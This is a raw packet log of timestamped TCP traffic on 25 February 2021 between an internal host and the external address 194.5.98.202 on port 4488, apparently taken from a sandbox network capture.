Feb 25, 2021 07:31:34.718460083 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.720462084 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.721159935 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.721456051 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.721978903 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.724606991 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.724776030 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.725375891 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.725486994 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.727718115 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.727762938 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.727864981 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.727885962 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.728466988 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.728673935 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.731710911 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.731770039 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.731930017 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.731955051 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.732388020 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.732574940 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.733352900 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.733582020 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.992480993 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.992523909 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.992547989 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.992593050 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.992647886 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.992656946 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.992718935 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.992778063 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.993354082 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.993415117 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.995428085 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.995680094 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.997076988 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.997147083 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.999356031 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.999428034 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.000566006 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.000781059 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.002298117 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.002423048 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.003362894 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.003431082 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.006424904 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.006582975 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.006598949 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.006795883 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.007730007 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.007962942 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.009509087 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.009741068 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.011193991 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.011270046 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.012356043 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.012523890 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.013467073 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.013542891 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.015435934 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.015666962 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:35.018161058 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:35.018269062 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:39.232388020 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:39.486294985 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:39.486501932 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:39.738064051 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:40.046106100 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:40.141233921 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:40.353347063 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:40.478426933 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:40.932279110 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:40.932735920 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.277143002 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.312293053 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.313461065 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.313817978 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.315278053 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.316461086 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.316585064 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.316652060 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.318480968 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.320158958 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.321247101 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.321289062 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.321352005 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.323278904 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.573684931 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.573781013 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.575475931 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.576811075 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.577315092 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.577404976 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.578517914 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.580446005 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.581311941 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.581785917 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.582545042 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.582586050 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.582663059 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.584517956 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.584660053 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.584733963 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.587220907 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.588480949 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.588548899 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.590131998 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.591407061 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.592071056 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.592145920 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.593610048 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.595558882 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.595629930 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.826455116 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.827255964 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.827462912 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.830579996 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.835278034 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.835558891 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.839521885 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.843391895 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.843975067 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.850267887 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.852133036 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.852683067 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.853239059 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.855160952 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.855838060 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.856242895 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.858335972 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.859217882 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.859642029 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.861474991 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.861774921 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.862355947 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.865298033 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.865421057 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.866293907 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.866643906 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.867738962 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.868413925 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.869344950 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.869779110 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.872477055 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.873439074 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.874169111 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.875123978 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.876214027 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.876302004 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.877399921 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.879467964 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.880085945 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.880218983 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.883514881 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.884450912 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.884533882 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.886425972 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.886466026 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.886771917 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.888850927 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.889288902 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.889379025 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.891339064 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.892508030 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.893208027 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.895158052 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.895201921 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:41.895729065 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:41.898236036 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.082629919 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.083383083 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.083492041 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.085253000 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.085355043 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.085459948 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.087347984 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.088243008 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.088289022 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.089133024 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.089855909 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.091572046 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.092442989 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.092641115 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.093539000 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.094418049 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.095299959 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.095681906 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.108788967 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.109066010 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.109582901 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.110481024 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.110626936 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.111504078 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.114598989 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.114689112 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.115295887 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.116460085 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.117011070 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.117583036 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.120305061 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.121095896 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.130647898 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.130688906 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.130728960 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.130765915 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.130883932 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.130924940 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.134238005 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134289026 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134330034 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134444952 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.134501934 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134545088 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134581089 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.134635925 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.134666920 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.136388063 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.136523962 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.136837006 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.139605045 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.139657021 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.140331030 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.140410900 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.142504930 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.142545938 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.142652988 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.143398046 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.143465042 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.146430969 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.146481991 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.146549940 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.147546053 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.148296118 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.148848057 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.149461031 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.150306940 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.150433064 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.151329041 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.152399063 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.153439045 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.154269934 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.155353069 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.155487061 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.156109095 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.157720089 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.157829046 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.158406973 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.338592052 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.338641882 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.338676929 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.340544939 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.340586901 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.340600014 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.342379093 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.343389988 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.343576908 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.344285965 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.344356060 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.345493078 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.346210003 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.346273899 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.349452972 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.349492073 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.349571943 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.351418018 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.355259895 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.356331110 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.356385946 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.362382889 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.362446070 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.363126040 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.365379095 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.365674019 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.371345997 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.372253895 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.372427940 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.373457909 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.374660969 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.374953032 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.375577927 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.376463890 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.376523972 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.378381968 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.379221916 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.379283905 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.381618023 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.381659031 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.381724119 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.383486032 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.387598991 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.388328075 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.388545990 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.388583899 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.389817953 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.390113115 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.390414953 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.392637014 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.393260956 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.393321991 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.393342972 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.395318031 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.396842003 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.397336960 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.397821903 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.399148941 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.400217056 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.401597977 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.401671886 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.401714087 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.402231932 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.403446913 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.403971910 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.407159090 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.408472061 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.408982038 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.409327030 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.410187960 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.411324978 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.411355019 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.413275957 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.413446903 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.414475918 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.415271044 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.416354895 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.416376114 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.592359066 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.592459917 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.597557068 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.597588062 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.597672939 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.599354029 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.600358009 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.600442886 CET	49175	4488	192.168.2.22	194.5.98.202
